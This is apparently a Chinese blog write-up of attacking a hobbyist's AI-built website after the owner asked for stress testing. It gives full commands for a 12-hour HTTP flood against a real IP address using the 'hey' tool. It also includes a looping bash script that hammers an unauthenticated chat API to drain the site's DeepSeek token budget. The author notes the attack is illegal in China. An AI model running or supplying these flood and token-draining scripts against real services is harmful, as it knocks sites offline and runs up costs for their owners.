起始

一次偶然的机会，抖音上刷到小白用ai全栈搭建的网站请求压力测试，不由得感叹了一下如今ai的强大，这难得一遇的靶场感觉攻击起来会蛮有趣，随即满足一下他的请求。

过程

入侵一个服务器是很难的事情，但是想要使其这样程度的业务完全瘫痪却再简单不过了，这种直接将源服务器的ip暴露出来的，直接使用cc攻击。如果是cc攻击，curl的并发太高，导致攻击服务器直接挂掉，这里使用Go 写的hey。

wget https://hey-release.s3.us-east-2.amazonaws.com/hey_linux_amd64
chmod +x hey_linux_amd64
mv hey_linux_amd64 /usr/local/bin/hey
#并发200，总请求数50，持续12小时
hey -c 200 -q 50 -z 12h http://1.14.75.79:5000/dashboard

hey的简单用法：

hey http://example.com 
默认行为：并发50，请求总数200，GET 请求

hey -c 200 -n -z 1h 10000 http://example.com
含义：
参数	说明
-c	并发连接数
-n	总请求数
-z	持续时间 s,m,h

cc攻击成功使服务瘫痪

持续约12小时后，发现网站有未鉴权和疑似未流控的模型api接口，随即转换目标改为消耗token

通过F12调试找到api接口，随即进行调试，确定是deepseek模型

curl -N -X POST "http://1.14.75.79:5000/api/ai/chat/stream" \
-H "Content-Type: application/json" \
-d '{
"message": "你是什么大模型，是在线的api接口吗",
"stream": true
}'

使用jq并编写脚本进行持续post，脚本还未调试几次，发现token已经被瞬间消耗完毕

#!/usr/bin/env bash

URL="http://1.14.75.79:5000/api/ai/chat/stream"
CONCURRENCY=2

TOTAL_TOKENS=0
START=$(date +%s)

function worker() {
  curl -sN -X POST "$URL" \
    -H "Content-Type: application/json" \
    -H "Accept: text/event-stream" \
    -d '{"message":"给我讲解数学竞赛，内容不少于200字","stream":true}' |
  grep '^data:' |
  sed 's/^data: //' |
  grep -v '\[DONE\]' |
  jq -r '.choices[0].delta.content // empty' |
  wc -c
}

echo "🔥 开始 AI Token 吞吐压测..."
echo "目标并发: $CONCURRENCY"

while true; do
  while [ $(jobs -r | wc -l) -lt $CONCURRENCY ]; do
    {
      TOKENS=$(worker)
      TOTAL_TOKENS=$((TOTAL_TOKENS + TOKENS))
    } &
  done

  sleep 1

  NOW=$(date +%s)
  ELAPSED=$((NOW - START))
  TPS=$((TOTAL_TOKENS / (ELAPSED+1)))

  printf "\r⏱ %4ds | 🔗 Conn:%3d | 🔥 Tokens:%10d | 🚀 TPS:%7d" \
    "$ELAPSED" "$(jobs -r | wc -l)" "$TOTAL_TOKENS" "$TPS"
done

结果

最后也是作者也是成功破防，后续关停了服务器

虽然是主动请求的攻击，但是中国境内网络攻击属于违法行为，如果造成严重后果会构成破坏计算机信息系统罪，请勿模仿。后面对作者进行了一定的补偿